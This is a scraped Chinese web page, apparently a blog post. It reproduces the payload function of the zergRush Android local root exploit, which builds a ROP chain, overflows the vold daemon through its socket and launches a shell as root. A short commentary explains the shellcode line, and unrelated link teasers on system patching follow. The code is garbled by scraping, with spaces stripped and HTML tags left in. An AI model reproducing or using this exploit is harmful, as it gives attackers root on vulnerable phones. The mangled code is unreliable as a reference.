漏洞 — zergRush 漏洞扫描工具
memset(padding,0,128);
strcpy(padding,"LORDZZZZzzzz");
if(padding_sz>0){
memset(padding+12,'Z',padding_sz);
printf("[*]Poping%dmorezerglingsn",padding_sz);
}
elseif(padding_sz<0){
memset(padding,0,128);
memset(padding,'Z',12+padding_sz);
}
if((sock=socket_local_client("vold",ANDROID_SOCKET_NAMESPACE_RESERVED,SOCK_STREAM))<0)
die("[-]ErrorcreatingNydus");
sprintf(s_stack_addr,"%c%c%c%c",stack_addr&0xff,(stack_addr>>8)&0xff,(stack_addr>>16)&0xff,(stack_addr>>24)&0xff);
sprintf(s_stack_pivot_addr,"%c%c%c%c",stack_pivot&0xff,(stack_pivot>>8)&0xff,(stack_pivot>>16)&0xff,(stack_pivot>>24)&0xff);
sprintf(s_pop_r0_addr,"%c%c%c%c",pop_r0&0xff,(pop_r0>>8)&0xff,(pop_r0>>16)&0xff,(pop_r0>>24)&0xff);
sprintf(s_system,"%c%c%c%c",system_ptr&0xff,(system_ptr>>8)&0xff,(system_ptr>>16)&0xff,(system_ptr>>24)&0xff);
sprintf(s_heap_addr,"%c%c%c%c",heap_addr&0xff,(heap_addr>>8)&0xff,(heap_addr>>16)&0xff,(heap_addr>>24)&0xff);
strcpy(buf,"ZERG");
strcat(buf,"ZZ");
strcat(buf,s_stack_pivot_addr);
for(i=3;i<buffsz+1;i++)
strcat(buf,"ZZZZ");
strcat(buf,"");
strcat(buf,s_heap_addr);
n=strlen(buf);
bsh_addr=stack_addr+n+1+8+8+8+padding_sz+12+4;
if(check_addr(bsh_addr)==-1){
printf("[-]Colossus,we'redoomed!n");
exit(-1);
}
sprintf(s_bsh_addr,"%c%c%c%c",bsh_addr&0xff,(bsh_addr>>8)&0xff,(bsh_addr>>16)&0xff,(bsh_addr>>24)&0xff);
<strong><span>n+=sprintf(buf+n+1,"%s%sOVER%s%s%s%sZZZZ%s%c",s_stack_addr,s_heap_addr,padding,s_pop_r0_addr,s_bsh_addr,s_system,bsh,0);</span></strong>
printf("[*]Sending%dzerglings...n",n);
if((n=write(sock,buf,n+1))<0)
die("[-]Nydusseemsbroken");
sleep(3);
close(sock);
returnn;
}
看到上面加色的行了,原来他是用 socket 写的一个 shell code ,调用了他拷贝的 sh 程序。
在 vold 中执行 sh 肯定是 root 啊。
至此,原理很是清楚了, shell code 嘛,运行的时候把他 dump 出来用别的工具看吧!
更多阅读
xp系统下载2013最新版下载 win7系统下载32位
xp系统下载2013最新版下载 主要更新 * 海量驱动,兼容众多机型,使装机更加轻松! *更新了系统补丁和Office2003所有补丁到2013-12-01(可通过微软漏洞扫描和卫士漏洞扫描) *升级IE6为IE8,并打起所有IE补丁 * 更新QQ至QQ20
怎样修复系统的漏洞 怎样修复系统漏洞
应用软件或操作系统软件在逻辑设计上的存在缺陷或错误,被黑客利用,通过网络给电脑植入木马、病毒等方式来攻击或控制我们的电脑,窃取我们电脑中的重要资料和信息,甚至破坏我们的操作系统。所以说,系统漏洞的存在,对我们的资料信息来说是
OpenSSL 漏洞的原理简介 openssl ocsp 漏洞
????2014年4月8日晚,互联网爆出了又一重量级安全漏洞,即CVE-2014-0160,通俗来讲就是OpenSSL出现了安全漏洞。????说这个漏洞前,先介绍一下OpenSSL,OpenSSL是一个强大的安全套接字层密码库,很多支付网站等涉及资金交易的平台都用它来做加
如何批量下载漏洞补丁 360漏洞补丁下载
如何批量下载漏洞补丁——简介有时候我们要给一些内网服务器打上漏洞补丁,但由于不能直接连接互联网,就没办法直接下载漏洞补丁,这里有一个办法,就是给内网服务器安装上最新的360安全卫士,使用安全卫士的漏洞扫描扫描出所少的补丁,然后导
电脑漏洞是否应该修复 360系统修复高危漏洞卡
电脑漏洞是否应该修复——简介我们的电脑一般会安装一些安全卫士,像360,金山,百度等,这些所谓的安全卫士经常会提示我们进行漏洞的修复,有时候是十几个,有时候甚至更多,那么我们是否真的应该修复这些漏洞呢?今天的经验就来分享漏洞修复那些